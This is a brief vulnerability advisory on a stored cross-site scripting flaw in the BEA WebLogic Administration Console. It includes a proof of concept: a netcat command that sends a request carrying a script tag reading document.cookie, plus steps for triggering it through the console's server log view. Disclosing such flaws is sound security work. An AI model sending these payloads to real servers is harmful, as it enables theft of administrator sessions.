BEA WebLogic Administration Console Cross-Site Scripting Vulnerability

BEA WebLogic Administration Console Cross-Site Scripting Vulnerability

An exploit is not required.

The following proof of concept was provided:
1. Make a HTTP request containing XSS code to a target Web server

$ printf "GET /<script>alert(document.cookie)</script>GomoR HTTP/1.0\r\n\r\n" | nc www.example.com 80

2. Login into the Administration console
3. Go to the menu 'Network configurations/servers/myserver/'
4. Click on 'View server log'
5. Search for the string GomoR and click on the BEA-id event.